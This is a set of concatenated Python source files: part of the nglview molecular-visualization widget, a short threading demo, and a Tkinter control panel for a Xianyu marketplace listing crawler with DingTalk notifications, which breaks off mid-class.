self._remote_call('addShape', target='Widget', args=[name, shapes], fire_embed=True)
@_update_url
def add_representation(self, repr_type, selection='all', **kwargs):
'''Add structure representation (cartoon, licorice, ...) for given atom selection.
Parameters
----------
repr_type : str
type of representation. Please see {ngl_url} for further info.
selection : str or 1D array (atom indices) or any iterator that returns integer, default 'all'
atom selection
**kwargs: additional arguments for representation
Example
-------
>>> import nglview as nv
>>> import pytraj
>>> t = pytraj.datafiles.load_tz2()
>>> w = nv.show_pytraj(t)
>>> w.add_representation('cartoon', selection='protein', color='blue')
>>> w.add_representation('licorice', selection=[3, 8, 9, 11], color='red')
>>> w # doctest: +SKIP
Notes
-----
User can also use shortcut
>>> selection = 'protein'
>>> w.add_cartoon(selection) # w.add_representation('cartoon', selection)
'''
if repr_type == 'surface':
if 'useWorker' not in kwargs:
kwargs['useWorker'] = False
# avoid space sensitivity
repr_type = repr_type.strip()
# overwrite selection
selection = seq_to_string(selection).strip()
# make copy
kwargs2 = _camelize_dict(kwargs)
if 'component' in kwargs2:
component = kwargs2.pop('component')
else:
component = 0
for k, v in kwargs2.items():
try:
kwargs2[k] = v.strip()
except AttributeError:
# e.g.: opacity=0.4
kwargs2[k] = v
d = {'params': {'sele': selection}}
d['type'] = repr_type
d['params'].update(kwargs2)
params = d['params']
params.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
d['type'],
],
kwargs=params)
@_deprecated("DEPRECATED: Please use 'center' method")
def center_view(self, *args, **kwargs):
"""alias of `center_view`
"""
self.center(*args, **kwargs)
def center(self, selection='*', duration=0, component=0, **kwargs):
"""center view for given atom selection
Examples
--------
view.center_view(selection='1-4')
"""
self._remote_call('autoView',
target='compList',
args=[selection, duration],
kwargs={'component_index': component},
**kwargs)
@observe('_image_data')
def _on_render_image(self, change):
'''update image data to widget_image
Notes
-----
method name might be changed
'''
self._widget_image._b64value = change['new']
def render_image(self,
frame=None,
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and get image as ipywidgets.widget_image.Image
Parameters
----------
frame : int or None, default None
if None, use current frame
if specified, use this number.
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
Examples
--------
# tell NGL to render send image data to notebook.
view.render_image()
# make sure to call `get_image` method
view.get_image()
Notes
-----
You need to call `render_image` and `get_image` in different notebook's Cells
"""
if frame is not None:
self.frame = frame
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
iw = Image()
iw.width = '99%' # avoid ugly scroll bar on notebook.
self._remote_call('_exportImage',
target='Widget',
args=[iw.model_id],
kwargs=params)
# iw.value will be updated later after frontend send the image_data back.
return iw
def download_image(self,
filename='screenshot.png',
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and download scene at current frame
Parameters
----------
filename : str, default 'screenshot.png'
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
"""
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
self._remote_call('_downloadImage',
target='Widget',
args=[
filename,
],
kwargs=params)
def _ngl_handle_msg(self, widget, msg, buffers):
"""store message sent from Javascript.
How? use view.on_msg(get_msg)
Notes: message format should be {'type': type, 'data': data}
_ngl_handle_msg will call appropriate function to handle message "type"
"""
self._ngl_msg = msg
msg_type = self._ngl_msg.get('type')
if msg_type == 'request_frame':
frame = self.frame + self.player.step
if frame > self.max_frame:
frame = 0
elif frame < 0:
frame = self.max_frame
self.frame = frame
elif msg_type == 'updateIDs':
self._ngl_view_id = msg['data']
elif msg_type == 'removeComponent':
cindex = int(msg['data'])
self._ngl_component_ids.pop(cindex)
elif msg_type == 'repr_parameters':
data_dict = self._ngl_msg.get('data')
name = data_dict.pop('name') + '\n'
selection = data_dict.get('sele', '') + '\n'
# json change True to true
data_dict_json = json.dumps(data_dict).replace(
'true', 'True').replace('false', 'False')
data_dict_json = data_dict_json.replace('null', '"null"')
if self.player.widget_repr is not None:
# TODO: refactor
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = name
repr_selection.value = selection
elif msg_type == 'request_loaded':
if not self.loaded:
# trick to trigger observe loaded
# so two viewers can have the same representations
self.loaded = False
self.loaded = msg.get('data')
elif msg_type == 'request_repr_dict':
# update _repr_dict will trigger other things
# see _handle_repr_dict_changed
self._ngl_repr_dict = self._ngl_msg.get('data')
elif msg_type == 'stage_parameters':
self._ngl_full_stage_parameters = msg.get('data')
elif msg_type == 'async_message':
if msg.get('data') == 'ok':
self._event.set()
elif msg_type == 'image_data':
self._image_data = msg.get('data')
Widget.widgets[msg.get('ID')].value = base64.b64decode(
self._image_data)
def _request_repr_parameters(self, component=0, repr_index=0):
if self.n_components > 0:
self._remote_call('requestReprParameters',
target='Widget',
args=[component, repr_index])
def add_structure(self, structure, **kwargs):
'''add structure to view
Parameters
----------
structure : nglview.Structure object
Examples
--------
>>> view.add_trajectory(traj0) # doctest: +SKIP
... view.add_trajectory(traj1)
... # then add Structure
... view.add_structure(s)
See Also
--------
nglview.NGLWidget.add_component
'''
if not isinstance(structure, Structure):
raise ValueError(f'{structure} is not an instance of Structure')
self._load_data(structure, **kwargs)
self._ngl_component_ids.append(structure.id)
if self.n_components > 1:
self.center_view(component=len(self._ngl_component_ids) - 1)
self._update_component_auto_completion()
return self[-1]
def add_trajectory(self, trajectory, **kwargs):
'''add new trajectory to `view`
Parameters
----------
trajectory: nglview.Trajectory or its derived class or
a supported object, eg pytraj.Trajectory-like,
mdtraj.Trajectory, MDAnalysis objects, etc
See Also
--------
nglview.NGLWidget.add_component
Examples
--------
>>> import nglview as nv, pytraj as pt
>>> traj = pt.load(nv.datafiles.TRR, nv.datafiles.PDB)
>>> view = nv.show_pytraj(traj)
>>> # show view first
>>> view # doctest: +SKIP
>>> # add new Trajectory
>>> traj2 = pt.datafiles.load_tz2()
>>> c = view.add_trajectory(traj2)
'''
backends = BACKENDS
package_name = trajectory.__module__.split('.')[0]
if package_name in backends:
trajectory = backends[package_name](trajectory)
else:
trajectory = trajectory
self._load_data(trajectory, **kwargs)
setattr(trajectory, 'shown', True)
self._trajlist.append(trajectory)
self._update_max_frame()
self._ngl_component_ids.append(trajectory.id)
self._update_component_auto_completion()
return self[-1]
def add_pdbid(self, pdbid, **kwargs):
'''add new Structure view by fetching pdb id from rcsb
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> c = view.add_pdbid('1tsu')
>>> # which is equal to
>>> # view.add_component('rcsb://1tsu.pdb')
'''
return self.add_component(f'rcsb://{pdbid}.pdb', **kwargs)
def add_component(self, filename, **kwargs):
'''add component from file/trajectory/struture
Parameters
----------
filename : str or Trajectory or Structure or their derived class or url
**kwargs : additional arguments, optional
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> view # doctest: +SKIP
... filename = 'somefile.ccp4'
... view.add_component(filename)
Notes
-----
If you want to load binary file such as density data, mmtf format, it is
faster to load file from current or subfolder.
'''
# if passed a supported object, convert "filename" to nglview.Trajectory
try:
package_name = filename.__module__.split('.')[0]
except (TypeError, AttributeError):
# string filename
pass
else:
if package_name in BACKENDS:
filename = BACKENDS[package_name](filename)
self._load_data(filename, **kwargs)
# assign an ID
self._ngl_component_ids.append(str(uuid.uuid4()))
self._update_component_auto_completion()
return self[-1]
def _load_data(self, obj, **kwargs):
'''
Parameters
----------
obj : nglview.Structure or any object having 'get_structure_string' method or
string buffer (open(fn).read())
'''
kwargs2 = _camelize_dict(kwargs)
try:
is_url = FileManager(obj).is_url
except NameError:
is_url = False
if 'defaultRepresentation' not in kwargs2:
kwargs2['defaultRepresentation'] = True
if not is_url:
if hasattr(obj, 'get_structure_string'):
blob = obj.get_structure_string()
kwargs2['ext'] = obj.ext
passing_buffer = True
binary = False
else:
fh = FileManager(obj,
ext=kwargs.get('ext'),
compressed=kwargs.get('compressed'))
# assume passing string
blob = fh.read()
passing_buffer = not fh.use_filename
if fh.ext is None and passing_buffer:
raise ValueError('must provide extension')
kwargs2['ext'] = fh.ext
binary = fh.is_binary
use_filename = fh.use_filename
if binary and not use_filename:
# send base64
blob = base64.b64encode(blob).decode('utf8')
blob_type = 'blob' if passing_buffer else 'path'
args = [{'type': blob_type, 'data': blob, 'binary': binary}]
else:
# is_url
blob_type = 'url'
url = obj
args = [{'type': blob_type, 'data': url, 'binary': False}]
name = py_utils.get_name(obj, kwargs2)
self._ngl_component_names.append(name)
self._remote_call("loadFile",
target='Stage',
args=args,
kwargs=kwargs2)
def remove_component(self, c):
"""remove component by its uuid.
If isinstance(c, ComponentViewer), `c` won't be associated with `self`
Parameters
----------
c : Union[int, ComponentViewer]
Examples
--------
>>> c0 = view.add_trajectory(traj0) # doctest: +SKIP
... c1 = view.add_trajectory(traj1)
... c2 = view.add_struture(structure)
... # remove last component
... view.remove_component(c2)
... assert c2._view is None
"""
if isinstance(c, ComponentViewer):
component_id = c.id
c._view = None
else:
component_id = c
self._clear_component_auto_completion()
if self._trajlist:
for traj in self._trajlist:
if traj.id == component_id:
self._trajlist.remove(traj)
component_index = self._ngl_component_ids.index(component_id)
self._ngl_component_ids.remove(component_id)
self._ngl_component_names.pop(component_index)
self._remote_call('removeComponent',
target='Stage',
args=[
component_index,
])
self._update_component_auto_completion()
def _dry_run(self, func, *args, **kwargs):
return _dry_run(self, func, *args, **kwargs)
def _get_remote_call_msg(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
"""call NGL's methods from Python.
Parameters
----------
method_name : str
target : str, {'Stage', 'Viewer', 'compList', 'StructureComponent'}
args : list
kwargs : dict
if target is 'compList', "component_index" could be passed
to specify which component will call the method.
Examples
--------
view._remote_call('loadFile', args=['1L2Y.pdb'],
target='Stage', kwargs={'defaultRepresentation': True})
# perform autoView for 1st component
# JS code
# component = Stage.compList[1];
# component.autoView('*', 200)
# python
view._remote_call('autoView',
target='component',
args=['*', 200],
kwargs={'component_index': 1})
"""
# NOTE: _camelize_dict here?
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
msg = {}
if 'component_index' in kwargs:
msg['component_index'] = kwargs.pop('component_index')
if 'repr_index' in kwargs:
msg['repr_index'] = kwargs.pop('repr_index')
if 'default' in kwargs:
kwargs['defaultRepresentation'] = kwargs.pop('default')
# Color handling
reconstruc_color_scheme = False
if 'color' in kwargs and isinstance(kwargs['color'],
color._ColorScheme):
kwargs['color_label'] = kwargs['color'].data['label']
# overite `color`
kwargs['color'] = kwargs['color'].data['data']
reconstruc_color_scheme = True
if kwargs.get('colorScheme') == 'volume' and kwargs.get('colorVolume'):
assert isinstance(kwargs['colorVolume'], ComponentViewer)
kwargs['colorVolume'] = kwargs['colorVolume']._index
msg['target'] = target
msg['type'] = 'call_method'
msg['methodName'] = method_name
msg['reconstruc_color_scheme'] = reconstruc_color_scheme
msg['args'] = args
msg['kwargs'] = kwargs
if other_kwargs:
msg.update(other_kwargs)
return msg
def _trim_message(self, messages):
messages = messages[:]
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] == 'loadFile'
]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
remove_comps.reverse()
while remove_comps:
index, cindex = remove_comps.pop()
messages.pop(index)
messages.pop(load_comps[cindex])
load_comps.remove(load_comps[cindex])
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] == 'loadFile'
]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
remove_comps.reverse()
return messages
def _remote_call(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
msg = self._get_remote_call_msg(method_name,
target=target,
args=args,
kwargs=kwargs,
**other_kwargs)
def callback(widget, msg=msg):
widget.send(msg)
callback._method_name = method_name
callback._ngl_msg = msg
if self.loaded:
self._remote_call_thread.q.append(callback)
else:
# send later
# all callbacks will be called right after widget is loaded
self._ngl_displayed_callbacks_before_loaded.append(callback)
if callback._method_name not in _EXCLUDED_CALLBACK_AFTER_FIRING and \
(not other_kwargs.get("fire_once", False)):
archive = self._ngl_msg_archive[:]
archive.append(msg)
self._ngl_msg_archive = self._trim_message(archive)
def _get_traj_by_id(self, itsid):
"""return nglview.Trajectory or its derived class object
"""
for traj in self._trajlist:
if traj.id == itsid:
return traj
return None
def hide(self, indices):
"""set invisibility for given component/struture/trajectory (by their indices)
"""
traj_ids = {traj.id for traj in self._trajlist}
for index in indices:
comp_id = self._ngl_component_ids[index]
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=[
False,
],
kwargs={'component_index': index})
def show(self, **kwargs):
"""shortcut of `show_only`
"""
self.show_only(**kwargs)
def show_only(self, indices='all', **kwargs):
"""set visibility for given components (by their indices)
Parameters
----------
indices : {'all', array-like}, component index, default 'all'
"""
traj_ids = {traj.id for traj in self._trajlist}
if indices == 'all':
indices_ = set(range(self.n_components))
else:
indices_ = set(indices)
for index, comp_id in enumerate(self._ngl_component_ids):
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
else:
traj = None
if index in indices_:
args = [
True,
]
if traj is not None:
traj.shown = True
else:
args = [
False,
]
if traj is not None:
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=args,
kwargs={'component_index': index},
**kwargs)
def _js_console(self):
self.send(dict(type='get', data='any'))
def _get_full_params(self):
self.send(dict(type='get', data='parameters'))
def _display_image(self):
'''for testing
'''
from IPython import display
im_bytes = base64.b64decode(self._image_data)
return display.Image(im_bytes)
def _clear_component_auto_completion(self):
for index, _ in enumerate(self._ngl_component_ids):
name = 'component_' + str(index)
delattr(self, name)
def _js(self, code, **kwargs):
self._execute_js_code(code, **kwargs)
def _execute_js_code(self, code, **kwargs):
self._remote_call('executeCode',
target='Widget',
args=[code],
**kwargs)
def _update_component_auto_completion(self):
trajids = [traj.id for traj in self._trajlist]
for index, cid in enumerate(self._ngl_component_ids):
comp = ComponentViewer(self, index)
name = 'component_' + str(index)
setattr(self, name, comp)
if cid in trajids:
traj_name = 'trajectory_' + str(trajids.index(cid))
setattr(self, traj_name, comp)
def __getitem__(self, index):
"""return ComponentViewer
"""
postive_index = py_utils.get_positive_index(
index, len(self._ngl_component_ids))
return ComponentViewer(self, postive_index)
def __iter__(self):
"""return ComponentViewer
"""
for i, _ in enumerate(self._ngl_component_ids):
yield self[i]
class Fullscreen(DOMWidget):
"""EXPERIMENTAL
"""
_view_name = Unicode("FullscreenView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("FullscreenModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_is_fullscreen = Bool().tag(sync=True)
def __init__(self, target, views):
super().__init__()
self._target = target
self._views = views
def fullscreen(self):
self._js("this.fullscreen('%s')" % self._target.model_id)
def _js(self, code):
msg = {"executeCode": code}
self.send(msg)
@observe('_is_fullscreen')
def _fullscreen_changed(self, change):
if not change.new:
self._target.layout.height = '300px'
self.handle_resize()
def handle_resize(self):
for v in self._views:
v.handle_resize()
|
mtsleepD.py
|
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
print(name)
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nesc):
print("start loop", nloop, 'at:', ctime())
sleep(nesc)
print("loop", nloop, 'done at:', ctime())
def main():
print("starting at:", ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=ThreadFunc(loop, (i, loops[i]), loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print("all DONE at:", ctime())
if __name__ == '__main__':
main()
|
tkXianYu.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__author__ = 'AJay'
__mtime__ = '2019/4/15 0015'
"""
# ! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
import time
import threading
from datetime import datetime
import tkinter as tk
import os
from multiprocessing import Process
from dingding import DingMsg
from db import MongoKeyword, MongoProduct, MongoConfig, MongoTime
from multiprocessing import Process, JoinableQueue
from tkinter import *
from tkinter import scrolledtext
from tkinter import messagebox
from asy import XianYu
from asy import _run
class MainPage(object):
def __init__(self, master):
self.window = master
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 1400
wh = 650
x = (sw - ww) / 2
y = (sh - wh) / 2
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.threadnumVar = tk.IntVar()
self.salenumVar = tk.IntVar()
self.logMessage = JoinableQueue()
self.errMessage = JoinableQueue()
self.dbconf = MongoConfig()
self.dbprod = MongoProduct()
self.dbkey = MongoKeyword()
self.dbtime = MongoTime()
self.create_page()
self.show_logs()
self.asyCraler()
# self._temp_t()
def asyCraler(self):
TProcess_crawler = Process(target=_run, args=(self.logMessage, self.errMessage))
TProcess_crawler.daemon = True
TProcess_crawler.start()
TProcess_crawler.join()
def _temp_t(self):
t = threading.Thread(target=self.asyCraler, args=())
# t.daemon=True
t.start()
print('启动线程')
# t.join()
# TProcess_crawler.join()
def create_page(self):
self.meun() # 菜单
self.keyword() # 关键字
self.config() # 配置
self.log() # 日志
self.error_log() # 系统日志
self.user() # 用户信息
self.img() # 图片
# self.loading() # 进度条
def img(self): # 图片
photo = PhotoImage(file='xianyu.png')
label = Label(image=photo)
label.image = photo
label.grid(row=0, column=2, columnspan=2, rowspan=2, sticky=W + E + N + S, padx=5, pady=5)
def keyword(self): # 钉钉机器人
Keyword = tk.LabelFrame(self.window, text="钉钉机器人", padx=10, pady=10) # 水平,垂直方向上的边距均为10
Keyword.place(x=1070, y=100)
self.keywordListBox = Listbox(Keyword, width=35, height=8, )
self.keywordListBox.pack(side=LEFT)
keywordScroBar = Scrollbar(Keyword)
keywordScroBar.pack(side=RIGHT, fill=Y)
self.keywordListBox['yscrollcommand'] = keywordScroBar.set
keywords = self.dbconf.select_all()
for key in keywords:
keyword = key.get('webhook')
self.keywordListBox.insert(END, '机器人:{};'.format(keyword))
keywordScroBar['command'] = self.keywordListBox.yview
keywordoption = tk.LabelFrame(self.window, text="", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
keywordoption.place(x=1070, y=290)
tk.Button(keywordoption, text="添加机器人", command=self.add_keyword).grid(column=0, row=1, padx=9, pady=5)
tk.Button(keywordoption, text="删除机器人", command=self.delete_keyword).grid(column=1, row=1, padx=9, pady=5)
tk.Button(keywordoption, text="测试机器人", command=self.testLogin).grid(column=2, row=1, padx=9, pady=5)
def insert_userListbox(self):
userinfos = self.dbkey.select_all({})
for user in userinfos:
username = user.get('keyword')
pwd = user.get('minPrice')
maxP = user.get('maxPrice')
start = user.get('start')
if start == 1:
now_status = '开启'
else:
now_status = '关闭'
self.userListBox.insert(END, '关键字:{} 价格:{}-{} 状态:{};'.format(username, pwd, maxP, now_status))
def user(self): # 用户信息
User = tk.LabelFrame(self.window, text="关键字任务", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
User.place(x=30, y=100)
self.userListBox = Listbox(User, width=50, height=9, )
self.userListBox.pack(side=LEFT)
userScroBar = Scrollbar(User)
userScroBar.pack(side=RIGHT, fill=Y)
self.userListBox['yscrollcommand'] = userScroBar.set
self.insert_userListbox()
userScroBar['command'] = self.userListBox.yview
# userScrotext = scrolledtext.ScrolledText(User, width=30, height=6, padx=10, pady=10, wrap=tk.WORD)
# userScrotext.grid(columnspan=2, pady=10)
Useroption = tk.LabelFrame(self.window, text="", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Useroption.place(x=30, y=300)
tk.Button(Useroption, text="添加关键字", command=self.add_user).grid(column=0, row=1, padx=57, pady=5)
tk.Button(Useroption, text="删除关键字", command=self.delete_use).grid(column=1, row=1, padx=57, pady=5)
tk.Button(Useroption, text="一键开启", command=self.all_start).grid(column=0, row=3, padx=55, pady=5)
tk.Button(Useroption, text="一键关闭", command=self.all_stop).grid(column=1, row=3, padx=55, pady=5)
self.startBtn = tk.Button(Useroption, text="单项开启", command=self.start_spider)
self.startBtn.grid(column=0, row=2, padx=55, pady=5)
self.stopBtn = tk.Button(Useroption, text="单项关闭", command=self.stop_spider)
self.stopBtn.grid(column=1, row=2, padx=55, pady=5)
def config(self): # 配置
Config = tk.LabelFrame(self.window, text="配置", padx=25, pady=5) # 水平,垂直方向上的边距均为 10
Config.place(x=30, y=430)
tk.Label(Config, text="爬取频率/s:").grid(column=0, row=0, sticky='w', pady=5) #
tk.Label(Config, text="发送方式:").grid(column=0, row=1, sticky='w', pady=5) # 添加波特率标签
try:
configs = self.dbtime.select_one({})
self.threadnum = configs.get('time')
self.salenum = configs.get('type')
except Exception as e:
self.dbtime.insert({"flag": 1, "time": 10, "type": 3})
self.threadnum = 10
self.salenum = 3
self.threadnumVar.set(self.threadnum)
self.salenumVar.set(self.salenum)
self.threadEntry = tk.Entry(Config, textvariable=self.threadnumVar, width=38)
self.threadEntry.grid(column=1, row=0, pady=5)
self.saleEntry = tk.Entry(Config, textvariable=self.salenumVar, width=38)
self.saleEntry.grid(column=1, row=1, pady=5)
Config_start = tk.LabelFrame(self.window, text="", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Config_start.place(x=30, y=550)
tk.Button(Config_start, text="更新配置", command=self.updata_config).grid(column=0, row=0, pady=5, ipadx=20,padx=15)
self.clearDbBtn = tk.Button(Config_start, text="清空配置", command=self.clearDB)
self.clearDbBtn.config(bg='red')
self.clearDbBtn.grid(column=2, row=0, pady=5, ipadx=15,padx=15)
# self.exportDbBtn = tk.Button(Config_start, text="导出数据", command='')
# self.exportDbBtn.config(state=tk.DISABLED)
# self.exportDbBtn.grid(column=2, row=0, pady=5, ipadx=15)
# self.testloginBtn = tk.Button(Config_start, text="测试登录", command=self.testLogin)
# self.testloginBtn.grid(column=0, row=1, pady=5, ipadx=15)
# self.loginBtn = tk.Button(Config_start, text="账户登录", command=self.login)
# self.loginBtn.grid(column=1, row=1, pady=5, ipadx=15)
self.logoutBtn = tk.Button(Config_start, text="清除缓存", command=self.clear_product)
self.logoutBtn.grid(column=1, row=0, pady=5, ipadx=15,padx=15)
# self.listenBtn = tk.Button(Config_start, text="开启监听", command=self.listen_spider)
# self.listenBtn.grid(column=0, row=2, pady=5, ipadx=15)
# self.startBtn = tk.Button(Config_start, text="开始采集", command=self.start_spider)
# self.startBtn.grid(column=1, row=2, pady=5, ipadx=15)
# self.stopBtn = tk.Button(Config_start, text="停止采集", command=self.stop_spider)
# self.stopBtn.grid(column=2, row=2, pady=5, ipadx=15)
def loading(self):
# 进度条
Loading = tk.LabelFrame(self.window, text="进度条", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Loading.place(x=350, y=20)
canvas = tk.Canvas(Loading, width=665, height=22, bg="white")
canvas.grid()
def log(self): # 日志
self.logMessage.put('欢迎使用【闲鱼信息采集器】')
logInformation = tk.LabelFrame(self.window, text="日志", padx=10, pady=10) # 水平,垂直方向上的边距均为10
logInformation.place(x=450, y=100)
self.logInformation_Window = scrolledtext.ScrolledText(logInformation, width=77, height=22, padx=10, pady=10,
wrap=tk.WORD)
self.logInformation_Window.grid()
def error_log(self): # 系统日志
error_logInformation = tk.LabelFrame(self.window, text="系统日志", padx=10, pady=10) # 水平,垂直方向上的边距均为10
error_logInformation.place(x=450, y=460)
self.errorInformation_Window = scrolledtext.ScrolledText(error_logInformation, width=77, height=5, padx=10,
pady=10,
wrap=tk.WORD)
self.errorInformation_Window.grid()
# 菜单说明
def meun(self):
menubar = tk.Menu(self.window)
aboutmemu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label='关于', menu=aboutmemu)
aboutmemu.add_command(label='软件说明', command=self.show_Description)
aboutmemu.add_command(label='版本', command=self.show_Version)
aboutmemu.add_command(label='开发者', command=self.show_Developer)
window.config(menu=menubar)
# 添加关键字
def add_keyword(self):
optionKeyword(self.window, self.keywordListBox)
# 删除关键字
def delete_keyword(self):
if tk.messagebox.askyesno('警告', message='是否删除机器人'):
try:
value = self.keywordListBox.get(self.keywordListBox.curselection())
keyword = re.findall('机器人:(.*?);', value.replace('\n', '').replace(' ', ''), re.S)
print(keyword[0])
self.dbconf.delete({"webhook": keyword[0]})
self.keywordListBox.delete(ACTIVE)
self.errMessage.put('成功删除机器人:{}'.format(keyword[0]))
tk.messagebox.showinfo('成功', message='成功删除机器人:{}'.format(keyword[0]))
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定关键字删除')
# 测试机器人
def testLogin(self):
self.errMessage.put('进行机器人测试')
value = self.keywordListBox.get(self.keywordListBox.curselection())
keyword = re.findall('机器人:(.*?);', value.replace('\n', '').replace(' ', ''), re.S)
dmsg = DingMsg()
if dmsg.send_msg(webhook_url='https://oapi.dingtalk.com/robot/send?access_token=' + keyword[0],
data='欢迎测试闲鱼信息及时推送器-机器人验证', type=4):
tk.messagebox.showinfo(title='恭喜', message='信息已经发送到钉钉')
self.errMessage.put('信息已经发送到钉钉')
else:
tk.messagebox.showerror(title='警告', message='此链接可能失效,请重试')
self.errMessage.put('此链接可能失效,请重试')
# 添加用户账号
def add_user(self):
optionUser(self.window, self.userListBox)
def _get_active_keyList(self):
try:
value = self.userListBox.get(self.userListBox.curselection())
print(value)
user_pwd = re.findall('关键字:(.*?)价格', value.replace('\n', '').replace(' ', ''), re.S)
return user_pwd
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定关键字')
return ['请选定指定关键字']
# 删除用户账号
def delete_use(self):
user_pwd = self._get_active_keyList()
if user_pwd[0] == '请选定指定关键字':
self.errMessage.put('关闭闲鱼数据:{}采集'.format(user_pwd))
return False
if tk.messagebox.askyesno('警告', message='是否删除关键字'):
try:
self.dbkey.delete({"keyword": user_pwd[0]})
self.userListBox.delete(ACTIVE)
self.errMessage.put('成功删除关键字任务{}'.format(user_pwd[0]))
tk.messagebox.showinfo('成功', message='成功删除用户{}'.format(user_pwd[0]))
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定账户删除')
# 跟新配置
def updata_config(self):
self.logMessage.put('更新配置')
threadnum = self.threadEntry.get()
salenum = self.saleEntry.get()
print(threadnum)
print(salenum)
self.dbtime.update_time(int(threadnum))
self.dbtime.update_type(int(salenum))
tk.messagebox.showinfo(title='配置', message='配置信息更新成功!')
def all_start(self):
self.dbkey.collection.update_many({"start": 0}, {'$set': {"start": 1}})
self.userListBox.delete(0, END)
self.insert_userListbox()
self.errMessage.put('已开启全部任务')
tk.messagebox.showinfo(title='任务', message='已开启全部任务!')
def all_stop(self):
self.dbkey.collection.update_many({"start": 1}, {'$set': {"start": 0}})
self.userListBox.delete(0, END)
self.insert_userListbox()
self.errMessage.put('已关闭全部任务')
tk.messagebox.showinfo(title='任务', message='已关闭全部任务!')
def start_spider(self):
# TODO: 获取所有的配置信息函数。
user_pwd = self._get_active_keyList()
self.errMessage.put('开始闲鱼数据:{}采集'.format(user_pwd))
self.dbkey.update_start(user_pwd[0])
self.userListBox.delete(0, END)
self.insert_userListbox()
def stop_spider(self):
# TODO:按钮恢复
user_pwd = self._get_active_keyList()
self.errMessage.put('关闭闲鱼数据:{}采集'.format(user_pwd))
self.dbkey.update_stop(user_pwd[0])
self.userListBox.delete(0, END)
self.insert_userListbox()
def clear_product(self):
if tk.messagebox.askyesno(title='删除', message='这将清空缓存数据,是否确定删除?'):
self.logMessage.put('开始清除数据库缓存')
self.dbprod.delete_all({})
self.logMessage.put('清除数据库缓存结束')
tk.messagebox.showinfo(title='恭喜', message='清除数据库缓存结束')
# 清空数据库
def clearDB(self):
if tk.messagebox.askyesno(title='删除', message='这将清空所有的数据,是否确定删除?'):
if tk.messagebox.askyesno(title='再次确认', message='清空数据后请重启软件,是否确定删除?'):
self.dbkey.delete_all({})
self.dbtime.delete_all({})
self.dbconf.delete_all({})
self.dbprod.delete_all({})
self.logMessage.put('清除数据库所有数据')
self.logMessage.put('请重新启动软件,加载配置')
self.window.update()
tk.messagebox.showinfo(title='恭喜', message='所有数据清除完成!请重新启动软件,加载配置')
def log_queue(self):
while True:
log = self.logMessage.get()
date = datetime.now().strftime("%m-%d %H:%M:%S")
self.logInformation_Window.insert(END, '[{date}][{log}]'.format(date=date, log=log) + '\n')
self.logInformation_Window.see(END)
# self.logMessage.task_done()
def errlog_queue(self):
while True:
log = self.errMessage.get()
date = datetime.now().strftime("%m-%d %H:%M:%S")
self.errorInformation_Window.insert(END, '[{date}][{log}]'.format(date=date, log=log) + '\n')
self.errorInformation_Window.see(END)
def show_logs(self):
Tlog_queue = threading.Thread(target=self.log_queue, args=())
Terrlog_queue = threading.Thread(target=self.errlog_queue, args=())
Tlog_queue.daemon = True
Tlog_queue.start()
Terrlog_queue.daemon = True
Terrlog_queue.start()
# self.logMessage.join()
def show_Description(self):
Description(self.window)
def show_Version(self):
Version(self.window)
def show_Developer(self):
Developer(self.window)
# 机器人账户操作
class optionKeyword(object):
'''
机器人webhook添加,修改界面
'''
def __init__(self, master, userListBox):
self.master = master
self.userListBox = userListBox
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
self.dbconf = MongoConfig()
ww = 400
wh = 300
x = (sw - ww) / 4
y = (sh - wh) / 4
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.window.title('机器人')
self.keyword = tk.StringVar()
self.create_page()
def create_page(self):
